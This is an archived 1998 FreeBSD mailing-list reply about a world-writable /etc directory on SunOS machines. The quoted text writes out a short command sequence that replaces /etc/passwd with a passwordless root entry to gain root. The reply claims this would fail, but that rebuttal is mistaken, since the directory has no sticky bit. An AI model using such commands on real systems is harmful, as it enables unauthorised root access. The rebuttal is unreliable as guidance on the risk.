Date: Fri, 18 Dec 1998 09:54:54 -0000 From: "Bond, Jeffery" <Jeff.Bond@nectech.co.uk> To: "'FreeBSD questions'" <questions@FreeBSD.ORG> Cc: "'cjc@cc942873-a.ewndsr1.nj.home.com'" <cjc@cc942873-a.ewndsr1.nj.home.com> Subject: RE: Basic Security Question Message-ID: <084DD226F592D211988800A024AC583B02B783@exchange.nectech.co.uk>
next in thread | raw e-mail | index | archive | help
>Mark Ovens wrote,
>
>> and on all the Sparcs running SunOS4.1.3_U1 here are:
>>
>> gppsun4:/{8}% ls -ldug etc
>> drwxrwsrwx 10 bin staff 2048 Dec 17 09:30 etc
>>
>> which is even less secure as it's writable by all!
>
>I may be dense. Is that some kind of joke or something? As dense as I
>am, I know for sure that even I could take any account on a system
>with permissions like that and have control of root in this many
>keystrokes:
>
>% cd /etc
>% echo "root::0:0:Evil Root:/:/bin/csh" > passwd.new
>% mv passwd passwd.old
>% mv passwd.new passwd
>% su
>#
Just because the directory is writable, this doesnt mean the existing files
in it are too. You won't be able to do 'mv passwd passwd.old'.
Jeff
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?084DD226F592D211988800A024AC583B02B783>